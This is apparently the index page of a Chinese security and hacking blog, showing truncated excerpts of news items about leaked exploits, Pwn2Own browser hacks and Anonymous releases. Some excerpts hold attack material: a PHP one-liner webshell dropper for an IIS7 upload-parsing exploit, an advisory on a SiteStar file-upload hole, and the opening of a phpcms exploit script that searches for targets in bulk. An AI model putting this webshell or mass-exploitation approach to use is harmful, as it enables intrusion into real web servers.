微软最新安全漏洞遭泄露 漏洞分享项目受质疑

据路透社报道,由于中国一家黑客网站公布了微软一个安全漏洞的攻击方式,使得微软的安全漏洞分享信息流程遭到猛烈抨击。微软一般会提前向70多家安全公司透露新发现的重大漏洞,此次被称为“概念验证”(proof-of-concept)的代码漏洞可能就是由其中一家安全公司泄露的。   微软表示,它正在对此展开调查,并“将采取必要行动保护消费者,并确保分享的机密信息按照合同和项目的要求进行保护“。微软...

- 阅读全文 -

IIS7.0 php错误文件解析漏洞利用实例

得到www.webshell.cc(仅为举例,非真实)web服务为IIS7.0 www.webshell.cc/robots.txt后面加上/任意字符.php成功解析为php 注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马 <?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?> 如果文件...

- 阅读全文 -

MS12-020 远程执行漏洞发布

听说freerdp 模块是freerdp 是LINUX下的,远程工具,下载地址是https://github.com/FreeRDP/FreeRDP/downloads 看来只能我现在去搭建Linux环境测试一下了。   #!/usr/bin/env python ##############################################################...

- 阅读全文 -

Anonymous发布Anonymous-OS操作系统

Anonymous已经是大名鼎鼎了吧,最近Anonymous发布了命名为Anonymous-OS的操作系统,基于Ubuntu 11.10,提供各种web渗透测试工具,包括: - ParolaPass Password Generator - Find Host IP - Anonymous HOIC - Ddosim - Pyloris - Slowloris - TorsHammer - Sql...

- 阅读全文 -

建站之星 SiteStar V2.0 任意文件上传漏洞

发布日期:2011-03.16 发布作者:cnryan 影响版本:SiteStar V2.0 beta 官方网站:http://www.sitestar.cn/ 漏洞类型:文件上传 [1]漏洞概述: SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。 [2]漏洞分析: 漏洞产生在 /script/multiuploa...

- 阅读全文 -

赛门铁克称无需过度担心Anonymous泄露NAV2006源码一事

昨日黑客团体Anonymous公布了赛门铁克Norton AntiVirus 2006的源代码,这个1.07GB大小的源码包被放在海盗湾上自由下载,不少安全人员对此发出了警示,认为它会影响安全软件和恶意软件目前的平衡状况。   不过赛门铁克对此似乎并不非常紧张,他们在回答媒体提问时表示一方面正在分析代码确定真伪,另一方面用户也不必过于担心,因为这些“旧代码不会带来任何有关这些产品已被披露...

- 阅读全文 -

IE9已被攻破 IE10面临严重安全威胁

近日,在PWN20WN黑客大赛上,之前将Chrome攻破的VUPEN团队利用两个不同的0day漏洞攻破了一台安装了Windows7 SP1系统的电脑,这意味着IE9浏览器也在此次黑客大赛上被攻破。而团队的负责人Chaouki Bekrar表示,他们所利用的IE9的0day漏洞事实上完全可以适用于IE6到IE10的浏览器,这就意味着才搭载着WIN8亮相的IE10将会面临着严峻的安全威胁。  ...

- 阅读全文 -

Google Chrome再次沦陷

Google的Chrome浏览器周五再次沦陷,黑客利用一个0day漏洞穿透沙盒,完全控制了Windows 7系统。自称PinkiePie的少年黑客说,他花了一周半时间酝酿这次攻击,攻击组合了三个未知的漏洞。Chrome安全团队正在分析漏洞,如果得到确认,这位黑客将有资格获得6万美元奖金。   在Pwn2Own挑战赛上,黑客三次攻陷了Chrome,发现了五个漏洞,其中两个0day漏洞是被俄...

- 阅读全文 -

phpcms-exp 0day

<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastp...

- 阅读全文 -